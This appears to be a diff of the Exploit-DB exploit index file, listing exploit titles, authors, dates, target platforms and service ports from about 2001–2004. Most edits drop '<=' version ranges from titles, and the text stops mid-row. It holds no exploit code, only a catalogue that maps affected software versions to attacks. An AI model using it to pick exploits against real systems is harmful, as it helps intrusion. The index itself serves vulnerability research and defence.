-308,platforms/linux/remote/308.c,"MPlayer <= 1.0pre4 GUI - filename handling Overflow Exploit",2004-07-04,c0ntex,linux,remote,0 +307,platforms/linux/remote/307.py,"rlpr 2.04 - msg() Remote Format String Exploit",2004-06-25,jaguar,linux,remote,7290 +308,platforms/linux/remote/308.c,"MPlayer 1.0pre4 GUI - filename handling Overflow Exploit",2004-07-04,c0ntex,linux,remote,0 309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection Exploit",2004-07-04,"Nasir Simbolon",php,webapps,0 310,platforms/windows/remote/310.txt,"Microsoft Internet Explorer Remote Application.Shell Exploit",2004-07-09,Jelmer,windows,remote,0 311,platforms/multiple/remote/311.pl,"MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit",2004-07-10,"Eli Kara",multiple,remote,3306 @@ -322,7 +322,7 @@ id,file,description,date,author,platform,type,port 345,platforms/windows/dos/345.c,"UDP Stress Tester Denial of Service Exploit",2002-09-10,Cys,windows,dos,0 346,platforms/linux/remote/346.c,"Solaris /bin/login Remote Root Exploit (SPARC/x86)",2001-12-20,Teso,linux,remote,23 347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow Exploit",2002-05-14,Teso,linux,remote,0 -348,platforms/linux/remote/348.c,"wu-ftpd <= 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21 +348,platforms/linux/remote/348.c,"wu-ftpd 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21 349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Root Exploit",2002-05-01,Teso,multiple,remote,22 350,platforms/windows/local/350.c,"Microsoft Windows 2000 - Utility Manager Privilege Elevation Exploit (MS04-019)",2004-07-14,"Cesar Cerrudo",windows,local,0 351,platforms/windows/local/351.c,"Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0 @@ -338,7 +338,7 @@ id,file,description,date,author,platform,type,port 361,platforms/windows/remote/361.txt,"Flash FTP Server Directory Traversal",2004-07-22,CoolICE,windows,remote,0 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0 -364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 - SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 +364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service Exploit (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0 367,platforms/osx/local/367.txt,"Mac OS X - Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0 @@ -346,73 +346,73 @@ id,file,description,date,author,platform,type,port 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0 370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0 371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)",2004-08-02,anonymous,linux,dos,0 -372,platforms/linux/remote/372.c,"OpenFTPD <= 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 -373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 - (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 +372,platforms/linux/remote/372.c,"OpenFTPD 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 +373,platforms/linux/remote/373.c,"OpenFTPD 0.30.1 - (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0 -375,platforms/linux/local/375.c,"Linux Kernel <= 2.4.26 - File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 +375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer Remote Null Pointer Crash (mshtml.dll)",2004-08-04,anonymous,windows,dos,0 378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac Remote Arbitrary Code Execution Exploit",2004-08-06,anonymous,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 381,platforms/windows/local/381.c,"Serv-U 3.x < 5.x - Local Privilege Escalation Exploit",2004-08-08,"Andrés Acunha",windows,local,0 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow Exploit",2002-12-24,innerphobia,linux,remote,0 -383,platforms/multiple/dos/383.c,"psyBNC <= 2.3 - Denial of Service Exploit",2002-05-19,"Lunar Fault",multiple,dos,31337 +383,platforms/multiple/dos/383.c,"psyBNC 2.3 - Denial of Service Exploit",2002-05-19,"Lunar Fault",multiple,dos,31337 384,platforms/php/webapps/384.txt,"PHP (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 385,platforms/windows/dos/385.c,"Microsoft Messenger Denial of Service Exploit (MS03-043) (linux ver)",2004-08-08,VeNoMouS,windows,dos,0 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow Exploit",2004-08-09,c0ntex,linux,remote,80 -387,platforms/linux/remote/387.c,"Dropbear SSH <= 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 -388,platforms/windows/local/388.c,"Ollydbg <= 1.10 - Format String Bug",2004-08-10,"Ahmet Cihan",windows,local,0 +387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 +388,platforms/windows/local/388.c,"Ollydbg 1.10 - Format String Bug",2004-08-10,"Ahmet Cihan",windows,local,0 389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow Exploit",2004-08-11,infamous41md,linux,remote,0 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow Exploit",2004-08-13,infamous41md,linux,remote,0 -391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 - AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548 -392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 -393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 - png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,anonymous,linux,local,0 +391,platforms/osx/remote/391.pl,"Mac OS X 10.3.3 - AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548 +392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 +393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,anonymous,linux,local,0 394,platforms/linux/local/394.c,"ProFTPd (ftpdctl) - Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0 396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143 -398,platforms/linux/remote/398.c,"rsync <= 2.5.1 - Remote Exploit",2002-01-01,Teso,linux,remote,873 -399,platforms/linux/remote/399.c,"rsync <= 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873 +398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote Exploit",2002-01-01,Teso,linux,remote,873 +399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873 400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow Exploit (2)",2004-08-18,infamous41md,linux,remote,0 -401,platforms/windows/local/401.c,"IPSwitch IMail Server <= 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 +401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) Local Exploit",2004-08-18,anonymous,windows,local,0 -404,platforms/linux/remote/404.pl,"PlaySMS <= 0.7 - SQL Injection Exploit",2004-08-19,"Noam Rathaus",linux,remote,0 +404,platforms/linux/remote/404.pl,"PlaySMS 0.7 - SQL Injection Exploit",2004-08-19,"Noam Rathaus",linux,remote,0 405,platforms/linux/remote/405.c,"XV 3.x BMP Parsing Local Buffer Overflow Exploit",2004-08-20,infamous41md,linux,remote,0 406,platforms/php/webapps/406.pl,"phpMyWebhosting SQL Injection Exploit",2004-08-20,"Noam Rathaus",php,webapps,0 407,platforms/cgi/webapps/407.txt,"AWStats (5.0-6.3) Input Validation Hole in 'logfile'",2004-08-21,"Johnathan Bat",cgi,webapps,0 408,platforms/linux/remote/408.c,"Qt BMP Parsing Bug Heap Overflow Exploit",2004-08-21,infamous41md,linux,remote,0 409,platforms/bsd/remote/409.c,"BSD (telnetd) Remote Root Exploit",2001-06-09,Teso,bsd,remote,23 411,platforms/linux/local/411.c,"Sendmail 8.11.x - Exploit (i386-Linux)",2001-01-01,sd,linux,local,0 -413,platforms/linux/remote/413.c,"MusicDaemon <= 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 +413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote DoS and /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0 417,platforms/linux/local/417.c,"SquirrelMail - (chpasswd) Local Root Bruteforce Exploit",2004-08-25,Bytes,linux,local,0 -418,platforms/windows/remote/418.c,"Winamp <= 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0 +418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution Exploit",2004-08-25,"Petrol Designs",windows,remote,0 419,platforms/windows/dos/419.pl,"BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit",2004-08-26,"GulfTech Security",windows,dos,0 420,platforms/win_x86/dos/420.java,"Bird Chat 1.61 - Denial of Service",2004-08-26,"Donato Ferrante",win_x86,dos,0 421,platforms/windows/remote/421.c,"Gaucho 1.4 Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote,0 -422,platforms/windows/dos/422.c,"Painkiller <= 1.3.1 - Denial of Service Exploit",2004-08-27,"Luigi Auriemma",windows,dos,0 +422,platforms/windows/dos/422.c,"Painkiller 1.3.1 - Denial of Service Exploit",2004-08-27,"Luigi Auriemma",windows,dos,0 423,platforms/windows/dos/423.pl,"Easy File Sharing Webserver 1.25 - Denial of Service Exploit",2004-08-27,"GulfTech Security",windows,dos,0 424,platforms/linux/remote/424.c,"Citadel/UX Remote Buffer Overflow Exploit",2004-08-30,Nebunu,linux,remote,504 425,platforms/hardware/remote/425.c,"D-Link DCS-900 Camera Remote IP Address Changer Exploit",2004-08-31,anonymous,hardware,remote,0 426,platforms/windows/remote/426.c,"TiTan FTP Server Long Command Heap Overflow PoC Exploit",2004-08-31,lion,windows,remote,21 427,platforms/windows/dos/427.c,"WFTPD Pro Server 3.21 MLST Remote Denial of Service Exploit",2004-08-31,lion,windows,dos,0 428,platforms/windows/dos/428.c,"CesarFTP Server Long Command Denial of Service Exploit",2004-08-31,lion,windows,dos,0 -429,platforms/windows/dos/429.c,"Ground Control <= 1.0.0.7 - (Server/Client) Denial of Service Exploit",2004-08-31,"Luigi Auriemma",windows,dos,0 +429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service Exploit",2004-08-31,"Luigi Auriemma",windows,dos,0 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 SQL Injection Exploit",2004-09-01,aCiDBiTS,php,webapps,0 431,platforms/windows/remote/431.c,"AOL Instant Messenger AIM - 'Away' Message Remote Exploit (2)",2004-09-02,"John Bissell",windows,remote,0 -432,platforms/bsd/remote/432.c,"Courier-IMAP <= 3.0.2-r1 - auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 -433,platforms/multiple/dos/433.c,"Call of Duty <= 1.4 - Denial of Service Exploit",2004-09-05,"Luigi Auriemma",multiple,dos,0 +432,platforms/bsd/remote/432.c,"Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 +433,platforms/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service Exploit",2004-09-05,"Luigi Auriemma",multiple,dos,0 434,platforms/linux/local/434.sh,"CDRDAO - Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 435,platforms/windows/remote/435.c,"Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Remote Privilege Escalation",2004-09-08,mantra,php,webapps,0 -437,platforms/linux/remote/437.c,"Citadel/UX <= 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 +437,platforms/linux/remote/437.c,"Citadel/UX 6.23 - Remote USER Directive Exploit",2004-09-09,Nebunu,linux,remote,504 438,platforms/linux/local/438.c,"CDRecord - $RSH exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow Exploit",2004-09-12,Delikon,windows,remote,21 463,platforms/windows/dos/463.c,"Serv-U < 5.2 - Remote Denial of Service Exploit",2004-09-13,str0ke,windows,dos,0 464,platforms/cgi/webapps/464.txt,"Turbo Seek Null Byte Error Discloses Files to Remote Users",2004-09-13,durito,cgi,webapps,0 465,platforms/php/webapps/465.pl,"PHP-Nuke SQL Injection Edit/Save Message(s) Bug",2004-09-16,iko94,php,webapps,0 466,platforms/linux/local/466.pl,"htpasswd Apache 1.3.31 - Local Exploit",2004-09-16,"Luiz Fernando Camargo",linux,local,0 -468,platforms/windows/dos/468.c,"Pigeon Server <= 3.02.0143 - Denial of Service Exploit",2004-09-19,"Luigi Auriemma",windows,dos,0 +468,platforms/windows/dos/468.c,"Pigeon Server 3.02.0143 - Denial of Service Exploit",2004-09-19,"Luigi Auriemma",windows,dos,0 469,platforms/linux/local/469.c,"CDRecord's ReadCD - Local Root Exploit",2004-09-19,"Max Vozeler",linux,local,0 470,platforms/linux/local/470.c,"SudoEdit 1.6.8 - Local Change Permission Exploit",2004-09-21,"Angelo Rosiello",linux,local,0 471,platforms/windows/dos/471.pl,"Emulive Server4 7560 - Remote Denial of Service Exploit",2004-09-21,"GulfTech Security",windows,dos,66 @@ -421,9 +421,9 @@ id,file,description,date,author,platform,type,port 474,platforms/windows/dos/474.sh,"Microsoft Windows - JPEG Processing Buffer Overrun Exploit (MS04-028)",2004-09-22,perplexy,windows,dos,0 475,platforms/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator Exploit (MS04-028)",2004-09-23,"Elia Florio",windows,remote,0 476,platforms/linux/local/476.c,"glFTPd Local Stack Overflow Exploit (PoC) (Slackware 9.0/9.1/10.0)",2004-09-23,CoKi,linux,local,0 -477,platforms/windows/dos/477.c,"PopMessenger <= 1.60 - Remote Denial of Service Exploit",2004-09-23,"Luigi Auriemma",windows,dos,8473 +477,platforms/windows/dos/477.c,"PopMessenger 1.60 - Remote Denial of Service Exploit",2004-09-23,"Luigi Auriemma",windows,dos,8473 478,platforms/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028)",2004-09-25,ATmaCA,windows,remote,0 -479,platforms/linux/local/479.c,"GNU Sharutils <= 4.2.1 - Local Format String PoC Exploit",2004-09-25,n4rk0tix,linux,local,0 +479,platforms/linux/local/479.c,"GNU Sharutils 4.2.1 - Local Format String PoC Exploit",2004-09-25,n4rk0tix,linux,local,0 480,platforms/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow Exploit (MS04-028)",2004-09-25,"John Bissell",windows,remote,0 482,platforms/hp-ux/local/482.c,"HP-UX 11.0/11.11 swxxx - Local Root Shell Exploit",2002-12-11,watercloud,hp-ux,local,0 551,platforms/linux/dos/551.c,"MyServer 0.7.1 - (POST) Denial of Service Exploit",2004-09-27,"Tom Ferris",linux,dos,0 @@ -435,28 +435,28 @@ id,file,description,date,author,platform,type,port 562,platforms/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service Exploit",2004-09-29,"securma massine",windows,dos,0 565,platforms/php/webapps/565.txt,"Silent Storm Portal - Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0 566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow Exploit",2004-10-04,LoWNOISE,windows,remote,80 -568,platforms/windows/remote/568.c,"Icecast <= 2.0.1 Win32 - Remote Code Execution Exploit",2004-10-06,Delikon,windows,remote,8000 +568,platforms/windows/remote/568.c,"Icecast 2.0.1 Win32 - Remote Code Execution Exploit",2004-10-06,Delikon,windows,remote,8000 570,platforms/php/webapps/570.txt,"WordPress Blog - HTTP Splitting",2004-10-10,"Tenable NS",php,webapps,0 571,platforms/windows/dos/571.c,"Monolith Games Local Buffer Overflow Exploit",2004-10-10,"Luigi Auriemma",windows,dos,0 572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0 -573,platforms/windows/remote/573.c,"Icecast <= 2.0.1 Win32 - Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 +573,platforms/windows/remote/573.c,"Icecast 2.0.1 Win32 - Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0 -577,platforms/windows/remote/577.c,"YahooPOPs <= 1.6 - SMTP Port Buffer Overflow Exploit",2004-10-15,class101,windows,remote,25 +577,platforms/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow Exploit",2004-10-15,class101,windows,remote,25 578,platforms/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0 -579,platforms/bsd/local/579.sh,"BSD bmon <= 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0 -580,platforms/linux/remote/580.c,"Monit <= 4.2 - Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812 -581,platforms/linux/remote/581.c,"ProFTPD <= 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 -582,platforms/windows/remote/582.c,"YahooPOPs <= 1.6 - SMTP Remote Buffer Overflow Exploit",2004-10-18,"Diabolic Crab",windows,remote,25 +579,platforms/bsd/local/579.sh,"BSD bmon 1.2.1_2 - Local Exploit",2004-10-16,"Idan Nahoum",bsd,local,0 +580,platforms/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Root Exploit",2004-10-17,rtk,linux,remote,2812 +581,platforms/linux/remote/581.c,"ProFTPD 1.2.10 - Remote Users Enumeration Exploit",2004-10-17,"Leon Juranic",linux,remote,0 +582,platforms/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow Exploit",2004-10-18,"Diabolic Crab",windows,remote,25 583,platforms/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation Exploit (PoC)",2004-10-18,"Carl Livitt",windows,remote,0 584,platforms/windows/remote/584.c,"Microsoft Windows Metafile (.emf) Heap Overflow Exploit (MS04-032)",2004-10-20,houseofdabus,windows,remote,0 585,platforms/windows/dos/585.pl,"Microsoft Windows IIS - WebDAV XML Denial of Service Exploit (MS04-030)",2004-10-20,"Amit Klein",windows,dos,0 586,platforms/linux/local/586.c,"BitchX 1.0c19 - Local Root Exploit (suid?)",2004-10-20,Sha0,linux,local,0 -587,platforms/linux/local/587.c,"Apache <= 1.3.31 mod_include - Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0 +587,platforms/linux/local/587.c,"Apache 1.3.31 mod_include - Local Buffer Overflow Exploit",2004-10-21,xCrZx,linux,local,0 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 -589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 +589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000 -591,platforms/linux/local/591.c,"socat <= 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0 -592,platforms/windows/remote/592.py,"Ability Server <= 2.34 - (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21 +591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0 +592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21 593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server Remote DoS",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0 598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25 @@ -464,30 +464,30 @@ id,file,description,date,author,platform,type,port 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,anonymous,linux,local,0 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0 602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 - (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0 -603,platforms/windows/dos/603.c,"Master of Orion III <= 1.2.5 - Denial of Service Exploit",2004-10-27,"Luigi Auriemma",windows,dos,0 -604,platforms/windows/dos/604.c,"Age of Sail II <= 1.04.151 - Remote Buffer Overflow Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 -605,platforms/windows/dos/605.c,"Alpha Black Zero <= 1.04 - Remote Denial of Service Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 -606,platforms/windows/dos/606.c,"Chatman <= 1.5.1 RC1 - Broadcast Crash Exploit",2004-03-01,"Luigi Auriemma",windows,dos,0 -607,platforms/windows/dos/607.c,"Flash Messaging <= 5.2.0g - Remote Denial of Service Exploit",2004-03-02,"Luigi Auriemma",windows,dos,0 +603,platforms/windows/dos/603.c,"Master of Orion III 1.2.5 - Denial of Service Exploit",2004-10-27,"Luigi Auriemma",windows,dos,0 +604,platforms/windows/dos/604.c,"Age of Sail II 1.04.151 - Remote Buffer Overflow Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 +605,platforms/windows/dos/605.c,"Alpha Black Zero 1.04 - Remote Denial of Service Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 +606,platforms/windows/dos/606.c,"Chatman 1.5.1 RC1 - Broadcast Crash Exploit",2004-03-01,"Luigi Auriemma",windows,dos,0 +607,platforms/windows/dos/607.c,"Flash Messaging 5.2.0g - Remote Denial of Service Exploit",2004-03-02,"Luigi Auriemma",windows,dos,0 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow Exploit",2004-10-28,infamous41md,linux,remote,69 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0 611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal / DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0 -616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80 +616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25 621,platforms/windows/remote/621.c,"CCProxy 6.2 - (ping) Remote Buffer Overflow Exploit",2004-11-10,KaGra,windows,remote,23 -623,platforms/windows/remote/623.c,"SlimFTPd <= 3.15 - Remote Buffer Overflow Exploit",2004-11-10,class101,windows,remote,21 -624,platforms/linux/local/624.c,"Linux Kernel <= 2.4.27 / 2.6.8 - binfmt_elf Executable File Read Exploit",2004-11-10,"Paul Starzetz",linux,local,0 +623,platforms/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow Exploit",2004-11-10,class101,windows,remote,21 +624,platforms/linux/local/624.c,"Linux Kernel 2.4.27 / 2.6.8 - binfmt_elf Executable File Read Exploit",2004-11-10,"Paul Starzetz",linux,local,0 625,platforms/windows/dos/625.pl,"WinFTP Server 1.6 - Denial of Service Exploit",2004-11-11,KaGra,windows,dos,0 -626,platforms/windows/dos/626.c,"Kerio Personal Firewall <= 4.1.1 - Multiple IP Options DoS Exploit",2004-11-12,houseofdabus,windows,dos,0 +626,platforms/windows/dos/626.c,"Kerio Personal Firewall 4.1.1 - Multiple IP Options DoS Exploit",2004-11-12,houseofdabus,windows,dos,0 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow Exploit",2004-11-12,Zatlander,windows,remote,143 -628,platforms/windows/dos/628.c,"NetNote Server <= 2.2 build 230 - Crafted String DoS Exploit",2004-11-13,class101,windows,dos,0 +628,platforms/windows/dos/628.c,"NetNote Server 2.2 build 230 - Crafted String DoS Exploit",2004-11-13,class101,windows,dos,0 629,platforms/multiple/local/629.c,"Multiple AntiVirus - .zip Detection Bypass Exploit",2004-11-14,oc192,multiple,local,0 630,platforms/php/webapps/630.pl,"UBB.threads 6.2.x < 6.3x - One Char Bruteforce Exploit",2004-11-15,RusH,php,webapps,0 631,platforms/php/webapps/631.txt,"vBulletin LAST.php SQL Injection",2004-11-15,anonymous,php,webapps,0 -634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0 +634,platforms/windows/dos/634.pl,"Secure Network Messenger 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,anonymous,php,webapps,0 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,80 637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25 @@ -497,51 +497,51 @@ id,file,description,date,author,platform,type,port 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow Exploit",2004-11-21,"Reed Arvin",windows,remote,110 645,platforms/php/webapps/645.pl,"GFHost PHP GMail Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0 -647,platforms/php/webapps/647.pl,"phpBB <= 2.0.10 - Remote Command Execution Exploit",2004-11-22,RusH,php,webapps,0 +647,platforms/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution Exploit",2004-11-22,RusH,php,webapps,0 648,platforms/php/webapps/648.pl,"Invision Power Board 2.0.0 < 2.0.2 - SQL Injection Exploit",2004-11-22,RusH,php,webapps,0 649,platforms/windows/dos/649.c,"wodFtpDLX Client ActiveX Control Buffer Overflow Crash Exploit",2004-11-22,Komrade,windows,dos,0 -650,platforms/windows/remote/650.c,"CoffeeCup FTP Clients (Direct <= 6.2.0.62) (Free <= 3.0.0.10) - BoF 